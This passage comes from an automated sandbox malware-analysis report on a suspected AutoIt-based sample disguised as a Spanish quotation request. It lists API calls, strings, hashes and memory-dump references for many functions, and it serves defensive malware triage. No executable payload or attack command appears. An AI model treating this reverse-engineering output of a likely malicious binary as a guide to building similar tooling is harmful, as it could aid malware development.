ATAPI, xrefs: 00274C91
SAS, xrefs: 00274CC9
Network, xrefs: 00274C02
SATA, xrefs: 00274CD0
1394, xrefs: 00274C9F
USB, xrefs: 00274CB4
SCSI, xrefs: 00274C8A
SSA, xrefs: 00274CA6
Fibre, xrefs: 00274CAD
Removable, xrefs: 00274C10, 00274C15
MMC, xrefs: 00274CDE
ATA, xrefs: 00274C98
SSD, xrefs: 00274C4A
CDROM, xrefs: 00274BFB
\\.\, xrefs: 00274B3F
RAID, xrefs: 00274CBB
PhysicalDrive, xrefs: 00274B76
Virtual, xrefs: 00274CE5

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: b13667c7853351bcaf1cf069ea084caa77e7eda3a3008aa8d247f2261e2bb627
Instruction ID: bddc948a7365641b362543c82940fb05e3b7329b2a633d046229cf88f419850e
Opcode Fuzzy Hash: b13667c7853351bcaf1cf069ea084caa77e7eda3a3008aa8d247f2261e2bb627
Instruction Fuzzy Hash: B561A2316352069BCB15EF24C985E6977A0AF06304B24C21FF80BAB692DB71EDB1DB51

Function 002973E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00297421
SetTextColor.GDI32(?,?), ref: 00297425
GetSysColorBrush.USER32(0000000F), ref: 0029743B
GetSysColor.USER32(0000000F), ref: 00297446
CreateSolidBrush.GDI32(?), ref: 0029744B
GetSysColor.USER32(00000011), ref: 00297463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00297471
SelectObject.GDI32(?,00000000), ref: 00297482
SetBkColor.GDI32(?,00000000), ref: 0029748B
SelectObject.GDI32(?,?), ref: 00297498
InflateRect.USER32(?,000000FF,000000FF), ref: 002974B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002974CE
GetWindowLongW.USER32(00000000,000000F0), ref: 002974DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0029752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00297554
InflateRect.USER32(?,000000FD,000000FD), ref: 00297572
DrawFocusRect.USER32(?,?), ref: 0029757D
GetSysColor.USER32(00000011), ref: 0029758E
SetTextColor.GDI32(?,00000000), ref: 00297596
DrawTextW.USER32(?,002970F5,000000FF,?,00000000), ref: 002975A8
SelectObject.GDI32(?,?), ref: 002975BF
DeleteObject.GDI32(?), ref: 002975CA
SelectObject.GDI32(?,?), ref: 002975D0
DeleteObject.GDI32(?), ref: 002975D5
SetTextColor.GDI32(?,?), ref: 002975DB
SetBkColor.GDI32(?,?), ref: 002975E5

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 44b3c1874a72bd8d10764ac645427d125885d50e4a7c3080ea73fe22b3e1bd95
Instruction ID: a7669c2c6deabc6563425a5cf208dc69b759647cbdd3b4893c1b6303fd375be4
Opcode Fuzzy Hash: 44b3c1874a72bd8d10764ac645427d125885d50e4a7c3080ea73fe22b3e1bd95
Instruction Fuzzy Hash: 87616D72910219AFDF019FA4EC49EEEBFB9EB08320F214116F915BB2A1D7709950CF90

Function 00290FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00291128
GetDesktopWindow.USER32 ref: 0029113D
GetWindowRect.USER32(00000000), ref: 00291144
GetWindowLongW.USER32(?,000000F0), ref: 00291199
DestroyWindow.USER32(?), ref: 002911B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002911ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0029120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0029121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00291232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00291245
IsWindowVisible.USER32(00000000), ref: 002912A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 002912BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 002912D0
GetWindowRect.USER32(00000000,?), ref: 002912E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0029130E
GetMonitorInfoW.USER32(00000000,?), ref: 00291328
CopyRect.USER32(?,?), ref: 0029133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 002913AA

Strings

(, xrefs: 0029131B
0, xrefs: 002910D3
tooltips_class32, xrefs: 002911E6

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 93c31b664d82a4ed151a39726423f7f781830d978b65ed7b1b91e906441dd325
Instruction ID: 3a8dee615b0c2773bb1fd6df9105d14bad3c52cb55416420e35c2937de7011b6
Opcode Fuzzy Hash: 93c31b664d82a4ed151a39726423f7f781830d978b65ed7b1b91e906441dd325
Instruction Fuzzy Hash: 20B1BE71614342AFDB10DF25C888B6ABBE4FF88354F008959F9999B2A1C731E864CF91

Function 00290241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002902E5
_wcslen.LIBCMT ref: 0029031F
_wcslen.LIBCMT ref: 00290389
_wcslen.LIBCMT ref: 002903F1
_wcslen.LIBCMT ref: 00290475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002904C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00290504

Part of subcall function 0021F9F2: _wcslen.LIBCMT ref: 0021F9FD

Part of subcall function 0026223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00262258
Part of subcall function 0026223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0026228A

Strings

FINDITEM, xrefs: 00290627
GETSELECTED, xrefs: 002905E1
VIEWCHANGE, xrefs: 00290675
SELECTALL, xrefs: 00290515
ISSELECTED, xrefs: 002904DD
SELECTINVERT, xrefs: 0029057E
SELECTCLEAR, xrefs: 0029052D
GETSELECTEDCOUNT, xrefs: 00290470, 0029048B
GETSUBITEMCOUNT, xrefs: 00290384, 0029039F
DESELECT, xrefs: 0029059C
GETITEMCOUNT, xrefs: 00290316, 00290337
SELECT, xrefs: 00290548
GETTEXT, xrefs: 002903EC, 00290407

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 395ce7d143d021461ea89b52a943b29b08556880d5fc7da69313923cc666dc0b
Instruction ID: 5da908fdb6ebfd122a3b8be21a46ce18003103a66577f81500e6ab8b24217a97
Opcode Fuzzy Hash: 395ce7d143d021461ea89b52a943b29b08556880d5fc7da69313923cc666dc0b
Instruction Fuzzy Hash: BFE1A1312383068FCB14DF24C99092AB7E6BFD8714B54466DF8969B2A2DB30ED65CF41

Function 00218891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00218968
GetSystemMetrics.USER32(00000007), ref: 00218970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0021899B
GetSystemMetrics.USER32(00000008), ref: 002189A3
GetSystemMetrics.USER32(00000004), ref: 002189C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 002189E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 002189F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00218A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00218A3C
GetClientRect.USER32(00000000,000000FF), ref: 00218A5A
GetStockObject.GDI32(00000011), ref: 00218A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00218A81

Part of subcall function 0021912D: GetCursorPos.USER32(?), ref: 00219141
Part of subcall function 0021912D: ScreenToClient.USER32(00000000,?), ref: 0021915E
Part of subcall function 0021912D: GetAsyncKeyState.USER32(00000001), ref: 00219183
Part of subcall function 0021912D: GetAsyncKeyState.USER32(00000002), ref: 0021919D

SetTimer.USER32(00000000,00000000,00000028,002190FC), ref: 00218AA8

Strings

AutoIt v3 GUI, xrefs: 00218A20

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: abe9e5b5ffe372c5fd24f56c74e59aedce325aadf2879aa539ea45dca5a343b0
Instruction ID: 2d8c93002c7d285d02646a02be7432f25b26cfe10bccf88904c270d42357ecbf
Opcode Fuzzy Hash: abe9e5b5ffe372c5fd24f56c74e59aedce325aadf2879aa539ea45dca5a343b0
Instruction Fuzzy Hash: 72B17031A1020AAFDB14DFA8DC99BEE7BB5FB48315F11421AFA15E7290DB709860CF54

Function 00260D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002610F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00261114
Part of subcall function 002610F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00260B9B,?,?,?), ref: 00261120
Part of subcall function 002610F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00260B9B,?,?,?), ref: 0026112F
Part of subcall function 002610F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00260B9B,?,?,?), ref: 00261136
Part of subcall function 002610F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0026114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00260DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00260E29
GetLengthSid.ADVAPI32(?), ref: 00260E40
GetAce.ADVAPI32(?,00000000,?), ref: 00260E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00260E96
GetLengthSid.ADVAPI32(?), ref: 00260EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00260EB5
HeapAlloc.KERNEL32(00000000), ref: 00260EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00260EDD
CopySid.ADVAPI32(00000000), ref: 00260EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00260F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00260F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00260F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00260F6E
HeapFree.KERNEL32(00000000), ref: 00260F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00260F7E
HeapFree.KERNEL32(00000000), ref: 00260F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00260F8E
HeapFree.KERNEL32(00000000), ref: 00260F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00260FA1
HeapFree.KERNEL32(00000000), ref: 00260FA8

Part of subcall function 00261193: GetProcessHeap.KERNEL32(00000008,00260BB1,?,00000000,?,00260BB1,?), ref: 002611A1
Part of subcall function 00261193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00260BB1,?), ref: 002611A8
Part of subcall function 00261193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00260BB1,?), ref: 002611B7

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 11a481cfd67781697a99df28221d1cae506c773850cf9b0ea3bc34958a34f033
Instruction ID: 8a744f30febf2ac4fe290bfe8c3e3905e7fefb689dd2b3567cdc8c4c780ddc5d
Opcode Fuzzy Hash: 11a481cfd67781697a99df28221d1cae506c773850cf9b0ea3bc34958a34f033
Instruction Fuzzy Hash: 71717B7291021AEBDF20DFA5EC88FAFBBB8BF04300F144125F919A6191DB319965DB60

Function 0028C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0028C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0029CC08,00000000,?,00000000,?,?), ref: 0028C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0028C5A4
_wcslen.LIBCMT ref: 0028C5F4
_wcslen.LIBCMT ref: 0028C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0028C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0028C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0028C84D
RegCloseKey.ADVAPI32(?), ref: 0028C881
RegCloseKey.ADVAPI32(00000000), ref: 0028C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0028C960

Strings

REG_QWORD, xrefs: 0028C8C3
REG_MULTI_SZ, xrefs: 0028C6F5
REG_EXPAND_SZ, xrefs: 0028C5CD
REG_BINARY, xrefs: 0028C913
REG_SZ, xrefs: 0028C644
REG_DWORD, xrefs: 0028C804

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 8d697ab2c39aef452e47af806feb172851151b9deeab4eb0e5dd8734b4415d68
Instruction ID: de11a5bb8fba220eabef41395d182a58df17e35ef935f04ab98c86e51d24e38f
Opcode Fuzzy Hash: 8d697ab2c39aef452e47af806feb172851151b9deeab4eb0e5dd8734b4415d68
Instruction Fuzzy Hash: BB1268356242019FCB14EF14C895A2ABBE5EF88714F14889DF84A9B3A2DB30FC51CF91

Function 0029091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002909C6
_wcslen.LIBCMT ref: 00290A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00290A54
_wcslen.LIBCMT ref: 00290A8A
_wcslen.LIBCMT ref: 00290B06
_wcslen.LIBCMT ref: 00290B81

Part of subcall function 0021F9F2: _wcslen.LIBCMT ref: 0021F9FD

Part of subcall function 00262BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00262BFA

Strings

UNCHECK, xrefs: 00290D3E
COLLAPSE, xrefs: 00290B01, 00290B1C
CHECK, xrefs: 00290A85, 00290AA0
GETSELECTED, xrefs: 00290C4E
GETTOTALCOUNT, xrefs: 002909F2, 00290A17
GETITEMCOUNT, xrefs: 00290C1E
SELECT, xrefs: 00290D11
EXISTS, xrefs: 00290B7C, 00290B97
ISCHECKED, xrefs: 00290CE1
GETTEXT, xrefs: 00290C97
EXPAND, xrefs: 00290BF8

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: c2cc53a7f0cb94630ae541b7a766b39dfe56fc0ddf086978e7ed7e657e25f104
Instruction ID: b700165ca8f8dc0612d83177d9db208a322864ae99466d5763bf3821efdb569a
Opcode Fuzzy Hash: c2cc53a7f0cb94630ae541b7a766b39dfe56fc0ddf086978e7ed7e657e25f104
Instruction Fuzzy Hash: 48E18D312287069FCB14DF24C49096AB7E1FF98318B14895DF8969B3A2D730EDA5CF91

Function 0028C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0028B6AE,?,?), ref: 0028C9B5
_wcslen.LIBCMT ref: 0028C9F1
_wcslen.LIBCMT ref: 0028CA68
_wcslen.LIBCMT ref: 0028CA9E
_wcslen.LIBCMT ref: 0028CAF9
_wcslen.LIBCMT ref: 0028CB2F
_wcslen.LIBCMT ref: 0028CB7F

Strings

HKLM, xrefs: 0028CA98, 0028CA9D
HKEY_LOCAL_MACHINE, xrefs: 0028CA62, 0028CA67
HKEY_CURRENT_CONFIG, xrefs: 0028CB79, 0028CB7E
HKCR, xrefs: 0028CB29, 0028CB2E
HKCC, xrefs: 0028CBAC
HKU, xrefs: 0028CBF0
HKCU, xrefs: 0028CBCE
HKEY_CURRENT_USER, xrefs: 0028CBBD
HKEY_CLASSES_ROOT, xrefs: 0028CAF3, 0028CAF8
HKEY_USERS, xrefs: 0028CBDF

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 54baacbc45f7954de1f9ed1cd004d4a9c3a2e7b4a3866fc18b548d3ebb573b67
Instruction ID: c30036a0b2a9081a694331fc2a296c1a0c2fd3ddf9f858793c28ab8cac981588
Opcode Fuzzy Hash: 54baacbc45f7954de1f9ed1cd004d4a9c3a2e7b4a3866fc18b548d3ebb573b67
Instruction Fuzzy Hash: FE71253663152B8BCB20FE7CDD41ABA3395AB60754B310229F866972C5E771CDB487B0

Function 0029833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0029835A
_wcslen.LIBCMT ref: 0029836E
_wcslen.LIBCMT ref: 00298391
_wcslen.LIBCMT ref: 002983B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002983F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00295BF2), ref: 0029844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00298487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 002984CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00298501
FreeLibrary.KERNEL32(?), ref: 0029850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0029851D
DestroyIcon.USER32(?,?,?,?,?,00295BF2), ref: 0029852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00298549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00298555

Strings

.icl, xrefs: 00298368
.exe, xrefs: 00298388
.dll, xrefs: 002983AB

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 6b4a1f24850bf7dd12b85ac5bdb9ce7440abc589a461e61d5409cc638e8812e4
Instruction ID: d34085eb33f0035902aab4003a28af4ea9b3f8209206d4e1a55a627ff801a586
Opcode Fuzzy Hash: 6b4a1f24850bf7dd12b85ac5bdb9ce7440abc589a461e61d5409cc638e8812e4
Instruction Fuzzy Hash: 8F61F271920216BFEF14DF64DC45BBE77A8BF05720F60460AF815D60D1DBB4A9A4CBA0

Function 00207778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#include, xrefs: 00207847
#requireadmin, xrefs: 002077FF
#ce, xrefs: 002078ED
#notrayicon, xrefs: 002077E7
Unterminated group of comments, xrefs: 0024528C
#comments-start, xrefs: 0020785F, 002078B1
", xrefs: 00245153
#comments-end, xrefs: 002078D9
Bad directive syntax error, xrefs: 0024519A
Cannot parse #include, xrefs: 00245279
#cs, xrefs: 00207873, 002078C5
#pragma compile, xrefs: 002077D3
#OnAutoItStartRegister, xrefs: 00207817
#include-once, xrefs: 0020782F
', xrefs: 00245169

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 6083d216d0792349bc005acac6b759e3ee080c9a75b587b631fadf9213f5be8d
Instruction ID: 2c11021c0e6b86ccddffe0785ca6fc5b6b2534ae8fda5ba947eeef5ae4d86954
Opcode Fuzzy Hash: 6083d216d0792349bc005acac6b759e3ee080c9a75b587b631fadf9213f5be8d
Instruction Fuzzy Hash: 1281E871A34315BBDB24AF60DC42FAE77A8AF55340F044025F909AA1D3EB70D971CAA1

Function 00265A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00265A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00265A40
SetWindowTextW.USER32(?,?), ref: 00265A57
